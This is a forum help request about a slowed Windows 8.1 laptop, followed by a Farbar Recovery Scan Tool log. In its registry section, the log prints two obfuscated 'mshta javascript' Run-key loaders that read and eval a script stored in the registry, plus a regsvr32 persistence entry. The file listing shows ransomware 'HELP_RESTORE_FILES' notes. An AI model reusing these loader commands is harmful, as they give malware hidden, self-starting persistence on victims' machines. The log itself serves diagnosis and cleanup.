Hi
Per topic title, SuperAntiSpyware seems to be present. The computer has almost ground to a complete halt. Help fixing the problem would be gratefully received.
Thanks, logs follow...........
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-05-2015 01
Ran by Nick (administrator) on NICKSLAPTOP on 28-05-2015 21:45:21
Running from C:\Users\Nick\Desktop
Loaded Profiles: Nick (Available Profiles: Nick)
Platform: Windows 8.1 (X64) OS Language: English (United Kingdom)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Amazon Inc.) C:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(Toshiba Corporation) C:\Program Files\TOSHIBA\Teco\TecoService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.3.374.0\McCSPServiceHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Teco\TecoResident.exe
() C:\Program Files (x86)\DTS, Inc\DTS Studio Sound\dts_apo_service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\System Setting\TssSrv.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(Toshiba Europe GmbH) C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(McAfee, Inc.) C:\Program Files\mcafee\virusscan\mcods.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\Core\mchost.exe
(Pro PC Cleaner) C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe
(Apple Inc.) C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\msfeedssync.exe
(Microsoft Corporation) C:\Windows\System32\wsqmcons.exe
(McAfee, Inc.) C:\Program Files\mcafee\vul\McVulCtr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
(Microsoft Corporation) C:\Windows\System32\OpenWith.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\PresentationHost.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [] => [X]
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [1008128 2014-04-28] (Conexant Systems, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1830616 2014-04-10] (Conexant Systems, Inc.)
HKLM\...\Run: [TecoResident] => C:\Program Files\TOSHIBA\Teco\TecoResident.exe [179288 2014-04-17] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [354144 2013-08-13] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\Hotkey\TCrdMain_Win8.exe [2556768 2013-10-08] (TOSHIBA Corporation)
HKLM\...\Run: [TSSSrv] => C:\Program Files (x86)\TOSHIBA\System Setting\TSSSrv.exe [296008 2013-10-21] (TOSHIBA Corporation)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [169768 2015-04-07] (Apple Inc.)
HKLM-x32\...\Run: [TSVU] => c:\Program Files\TOSHIBA\TOSHIBA Smart View Utility\TosSmartViewLauncher.exe [516512 2013-07-23] (TOSHIBA)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\Common Files\McAfee\Platform\mcuicnt.exe [643064 2015-02-09] (McAfee, Inc.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7799576 2015-05-20] (SUPERAntiSpyware)
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\...\Run: [KekjOzofe] => regsvr32.exe "C:\ProgramData\KekjOzofe\CoyegVelfo.mro"
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\...\Run: [**bbc72abd<*>] => mshta javascript:EX3eUYI="dP8";Y3x=new%20ActiveXObject("WScript.Shell");L4zZrEB="r8gB";UXD6U=Y3x.RegRead("HKCU\\software\\8332bb5d\\5d838d4f");tndL3yv="AyKD4S3";eval(UXD6U);i8eDmB0Vyk="JzF2fpws"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\...\Run: [**84d7cbd9<*>] => mshta javascript:tEpyh3V4SO="QxHlBFw6A";yW54=new%20ActiveXObject("WScript.Shell");ch3Kd0HrC="t8E";Eb5GF=yW54.RegRead("HKCU\\software\\4fd4e482\\a5ebc847");EbkU4AVhi="WQpC6wo3";eval(Eb5GF);f7JgtPn="b4W (the data entry has 8 more characters). <===== ATTENTION (Value Name with invalid characters)
AppInit_DLLs: C:\PROGRA~2\Amazon\AMAZON~1\AMAZON~2.DLL => C:\Program Files (x86)\Amazon\Amazon1ButtonApp\AmazonExtIE64.dll [402752 2015-04-22] (Amazon Inc.)
AppInit_DLLs-x32: C:\PROGRA~2\Amazon\AMAZON~1\AMAZON~3.DLL => C:\Program Files (x86)\Amazon\Amazon1ButtonApp\AmazonExtIE.dll [397120 2015-04-22] (Amazon Inc.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://toshiba13.msn.com/?pc=TEJB
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://toshiba.eu/symbaloo_c
HKU\S-1-5-21-3762328459-3212051721-594648359-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = https://www.google.c...ebhp?gws_rd=ssl
SearchScopes: HKU\S-1-5-21-3762328459-3212051721-594648359-1001 -> DefaultScope {63E2904B-EA60-46EE-BA82-A65CCAC33CBA} URL = https://uk.search.ya...&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3762328459-3212051721-594648359-1001 -> {19A71D89-8005-4F92-B690-6C8E8FD395BF} URL =
SearchScopes: HKU\S-1-5-21-3762328459-3212051721-594648359-1001 -> {63E2904B-EA60-46EE-BA82-A65CCAC33CBA} URL = https://uk.search.ya...&p={searchTerms}
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-05-13] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2015-02-27] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2015-02-27] (McAfee, Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 192.168.1.254
FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2015-02-27] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-10-30] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2015-02-27] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-20] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll [2015-05-20] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-06] ()
FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2015-02-26]
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-23] (SUPERAntiSpyware.com)
R2 Amazon 1Button App Service; C:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe [456000 2015-04-22] (Amazon Inc.)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2015-02-26] (Broadcom Corporation.)
R3 dts_apo_service; C:\Program Files (x86)\DTS, Inc\DTS Studio Sound\dts_apo_service.exe [21840 2014-06-30] ()
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [227904 2014-04-24] (WildTangent)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel® Corporation) [File not signed]
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel® Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [562200 2015-02-27] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [332528 2014-03-12] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.3.374.0\McCSPServiceHost.exe [422632 2015-01-22] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [601864 2015-02-27] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [1050952 2014-11-06] (McAfee, Inc.)
R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [221832 2014-10-01] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [189920 2014-10-01] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [335064 2014-10-31] (McAfee, Inc.)
S3 TemproMonitoringService; C:\Program Files (x86)\Toshiba TEMPRO\TemproSvc.exe [116088 2014-08-05] (Toshiba Europe GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347880 2014-03-24] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2014-03-24] (Microsoft Corporation)
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2015-02-26] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7545008 2015-02-26] (Broadcom Corporation)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [72136 2014-10-01] (McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
R3 mfeapfk; C:\Windows\System32\drivers\mfeapfk.sys [181584 2014-10-01] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [313680 2014-10-01] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [70608 2014-10-01] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [526360 2014-10-01] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [786304 2014-10-01] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\system32\DRIVERS\mfencbdc.sys [447440 2014-09-19] (McAfee, Inc.)
S3 mfencrk; C:\Windows\system32\DRIVERS\mfencrk.sys [96600 2014-09-19] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [348560 2014-10-01] (McAfee, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [293592 2014-02-11] (Realtek Semiconductor Corp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-02-21] (Synaptics Incorporated)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [33168 2013-10-10] (Windows ® Win 7 DDK provider)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123224 2014-03-24] (Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-05-28 21:45 - 2015-05-28 21:46 - 00015834 _____ () C:\Users\Nick\Desktop\FRST.txt
2015-05-28 21:43 - 2015-05-28 21:45 - 00000000 ____D () C:\FRST
2015-05-28 21:20 - 2015-05-28 21:20 - 02108928 _____ (Farbar) C:\Users\Nick\Desktop\FRST64.exe
2015-05-20 21:10 - 2015-05-20 21:10 - 00003666 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-05-10 10:33 - 2015-05-10 10:33 - 00003464 _____ () C:\Windows\System32\Tasks\ProPCCleaner_Popup
2015-05-08 07:42 - 2015-05-08 07:42 - 02181358 _____ () C:\Users\Nick\Desktop\HELP_RESTORE_FILES.bmp
2015-05-08 07:42 - 2015-05-08 07:42 - 00001726 _____ () C:\Users\Nick\Desktop\Save_Files.lnk
2015-05-08 07:42 - 2015-05-08 07:42 - 00001353 _____ () C:\Users\Nick\Desktop\HELP_RESTORE_FILES.txt
2015-05-08 07:41 - 2015-05-08 07:41 - 00001353 _____ () C:\Users\Public\HELP_RESTORE_FILES_bssdn.TXT
2015-05-08 07:41 - 2015-05-08 07:41 - 00001353 _____ () C:\Users\Public\Downloads\HELP_RESTORE_FILES_bssdn.TXT
2015-05-08 07:41 - 2015-05-08 07:41 - 00001353 _____ () C:\Users\Nick\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 21:01 - 2015-05-07 21:01 - 00001353 _____ () C:\Users\Nick\Downloads\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 21:01 - 2015-05-07 21:01 - 00001353 _____ () C:\Users\Nick\Documents\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 21:00 - 2015-05-08 07:41 - 00001353 _____ () C:\Users\Public\Documents\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 21:00 - 2015-05-07 21:00 - 00001353 _____ () C:\Users\Nick\AppData\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 21:00 - 2015-05-07 21:00 - 00001353 _____ () C:\ProgramData\HELP_RESTORE_FILES_bssdn.TXT
2015-05-07 20:17 - 2015-05-07 20:17 - 00001353 _____ () C:\Users\Nick\Downloads\HELP_RESTORE_FILES_kynqb.TXT
2015-05-07 20:17 - 2015-05-07 20:17 - 00001353 _____ () C:\Users\Nick\Documents\HELP_RESTORE_FILES_kynqb.TXT
2015-05-07 19:48 - 2015-05-07 19:48 - 00001353 _____ () C:\Users\Nick\AppData\HELP_RESTORE_FILES_kynqb.TXT
2015-05-07 19:45 - 2015-05-07 19:45 - 00001353 _____ () C:\Users\Public\Documents\HELP_RESTORE_FILES_kynqb.TXT
2015-05-07 19:44 - 2015-05-07 19:48 - 00001353 _____ () C:\ProgramData\HELP_RESTORE_FILES_kynqb.TXT
2015-05-07 19:39 - 2015-05-08 21:42 - 00000232 _____ () C:\Users\Nick\Documents\RECOVERY_FILE.TXT
2015-05-07 19:39 - 2015-05-08 07:42 - 00247398 _____ () C:\Users\Nick\AppData\Local\log.html
2015-05-07 19:39 - 2015-05-08 07:42 - 00000752 _____ () C:\Users\Nick\AppData\Local\storage.bin
2015-05-07 19:39 - 2015-05-07 19:38 - 00260608 _____ () C:\Users\Nick\AppData\Local\eooftfl.exe
2015-05-06 19:32 - 2015-05-06 19:34 - 00000153 _____ () C:\Users\Nick\AppData\Local\svcxdcl32.dat
2015-05-06 19:06 - 2015-05-07 21:00 - 00000000 ___HD () C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-05-06 19:06 - 2015-05-07 21:00 - 00000000 ____D () C:\ProgramData\KekjOzofe
2015-05-06 07:36 - 2015-05-06 07:36 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2015-05-05 05:24 - 2015-05-07 20:59 - 00000000 ____D () C:\SUPERDelete
2015-05-05 05:23 - 2015-05-28 20:55 - 00000000 ____D () C:\Program Files\SUPERAntiSpyware
2015-05-05 05:23 - 2015-05-07 21:00 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com
2015-05-05 05:23 - 2015-05-05 05:23 - 00001831 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
2015-05-05 05:23 - 2015-05-05 05:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\SUPERAntiSpyware.com
2015-05-05 05:23 - 2015-05-05 05:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware
2015-05-04 20:11 - 2015-05-04 20:26 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Apple Computer
2015-05-04 20:11 - 2015-05-04 20:11 - 00000000 ____D () C:\Users\Nick\AppData\Local\Apple Computer
2015-05-04 20:09 - 2015-05-04 20:09 - 00001776 _____ () C:\Users\Public\Desktop\iTunes.lnk
2015-05-04 20:09 - 2015-05-04 20:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-05-04 20:02 - 2012-10-03 16:14 - 00033240 _____ (GEAR Software Inc.) C:\Windows\system32\Drivers\GEARAspiWDM.sys
2015-05-04 20:00 - 2015-05-07 21:00 - 00000000 ____D () C:\ProgramData\Apple Computer
2015-05-04 20:00 - 2015-05-04 20:02 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
2015-05-04 20:00 - 2015-05-04 20:02 - 00000000 ____D () C:\Program Files\iTunes
2015-05-04 20:00 - 2015-05-04 20:00 - 00000000 ____D () C:\Program Files\iPod
2015-05-04 20:00 - 2015-05-04 20:00 - 00000000 ____D () C:\Program Files (x86)\iTunes
2015-05-04 19:59 - 2015-05-04 19:59 - 00002535 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-05-04 19:59 - 2015-05-04 19:59 - 00000000 ____D () C:\Windows\System32\Tasks\Apple
2015-05-04 19:59 - 2015-05-04 19:59 - 00000000 ____D () C:\Users\Nick\AppData\Local\Apple
2015-05-04 19:59 - 2015-05-04 19:59 - 00000000 ____D () C:\Program Files (x86)\Apple Software Update
2015-05-04 19:57 - 2015-05-04 20:00 - 00000000 ____D () C:\Program Files\Common Files\Apple
2015-05-04 19:57 - 2015-05-04 19:57 - 00000000 ____D () C:\Program Files\Bonjour
2015-05-04 19:57 - 2015-05-04 19:57 - 00000000 ____D () C:\Program Files (x86)\Bonjour
2015-05-04 19:55 - 2015-05-07 20:59 - 00000000 ____D () C:\ProgramData\Apple
2015-05-04 18:59 - 2015-05-07 21:00 - 00000000 ____D () C:\ProgramData\ToshibaEurope
2015-05-04 18:41 - 2015-05-04 18:41 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Mozilla
2015-05-04 18:41 - 2015-05-04 18:41 - 00000000 ____D () C:\Users\Nick\AppData\Local\Mozilla
2015-05-04 18:28 - 2013-09-23 13:49 - 00197704 _____ (McAfee, Inc.) C:\Windows\system32\Drivers\HipShieldK.sys
2015-05-04 18:21 - 2015-05-07 21:00 - 00000000 ____D () C:\Users\Nick\.swt
2015-05-04 18:21 - 2015-05-04 18:21 - 00003198 _____ () C:\Windows\System32\Tasks\ProPCCleaner_Start
2015-05-04 18:21 - 2015-05-04 18:21 - 00001817 _____ () C:\Users\Public\Desktop\Vuze.lnk
2015-05-04 18:21 - 2015-05-04 18:21 - 00001817 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vuze.lnk
2015-05-04 18:21 - 2015-05-04 18:21 - 00000000 __SHD () C:\Windows\SysWOW64\AI_RecycleBin
2015-05-04 18:21 - 2015-05-04 18:21 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pro PC Cleaner
2015-05-04 18:21 - 2015-05-04 18:21 - 00000000 ____D () C:\Program Files (x86)\Pro PC Cleaner
2015-05-04 18:20 - 2015-05-07 20:55 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Azureus
2015-05-04 18:19 - 2015-05-04 18:20 - 00000000 ____D () C:\Program Files\Vuze
2015-05-04 18:16 - 2015-05-09 22:44 - 00003934 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{F9FF822C-0040-496B-AFAC-33AEBC7E4EF4}
2015-05-04 18:16 - 2015-05-04 18:16 - 00000000 __SHD () C:\Users\Nick\AppData\Local\EmieUserList
2015-05-04 18:16 - 2015-05-04 18:16 - 00000000 __SHD () C:\Users\Nick\AppData\Local\EmieSiteList
2015-05-04 18:15 - 2015-05-04 18:15 - 00000000 ____D () C:\Users\Nick\AppData\Local\Google
2015-05-04 18:08 - 2015-05-04 18:08 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Macromedia
2015-05-04 18:07 - 2015-05-20 20:13 - 00000000 ___RD () C:\Users\Nick\OneDrive
2015-05-04 18:06 - 2015-05-28 21:39 - 00003596 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-3762328459-3212051721-594648359-1001
2015-05-04 18:05 - 2015-03-03 14:17 - 00295552 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2015-05-04 18:04 - 2015-05-04 18:04 - 00000000 ____D () C:\Users\Default\AppData\Local\Google
2015-05-04 18:04 - 2015-05-04 18:04 - 00000000 ____D () C:\Users\Default User\AppData\Local\Google
2015-05-04 18:02 - 2015-05-04 18:02 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2015-05-04 18:02 - 2015-05-04 18:02 - 00000000 ____D () C:\Users\Nick\AppData\Local\TOSHIBA
2015-05-04 17:59 - 2015-05-04 18:04 - 00000000 ____D () C:\Users\Nick\AppData\Local\Packages
2015-05-04 17:59 - 2015-05-04 17:59 - 00001453 _____ () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-05-04 17:59 - 2015-05-04 17:59 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Adobe
2015-05-04 17:59 - 2015-05-04 17:59 - 00000000 ____D () C:\Users\Nick\AppData\Local\VirtualStore
2015-05-04 17:53 - 2015-05-10 08:44 - 00000000 ____D () C:\Users\Nick
2015-05-04 17:53 - 2015-05-04 17:53 - 00000020 ___SH () C:\Users\Nick\ntuser.ini
2015-05-04 17:53 - 2014-09-10 00:05 - 00000000 ___RD () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-05-04 17:53 - 2014-09-09 23:54 - 00000000 ___RD () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-05-04 17:53 - 2014-03-18 16:34 - 00000369 _____ () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-05-04 17:53 - 2014-03-18 16:34 - 00000369 _____ () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-05-04 17:53 - 2013-08-22 16:36 - 00000000 ___RD () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-05-04 17:53 - 2013-08-22 16:36 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2015-05-28 21:28 - 2013-08-22 14:25 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2015-05-28 21:25 - 2014-09-10 00:39 - 00000926 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-05-28 21:20 - 2014-09-10 00:39 - 00000930 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-05-28 21:00 - 2013-08-22 16:36 - 00000000 ____D () C:\Windows\system32\sru
2015-05-20 21:11 - 2014-09-10 00:39 - 00003902 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-05-20 20:09 - 2013-08-22 15:45 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2015-05-11 01:20 - 2015-02-26 01:03 - 01298391 _____ () C:\Windows\WindowsUpdate.log
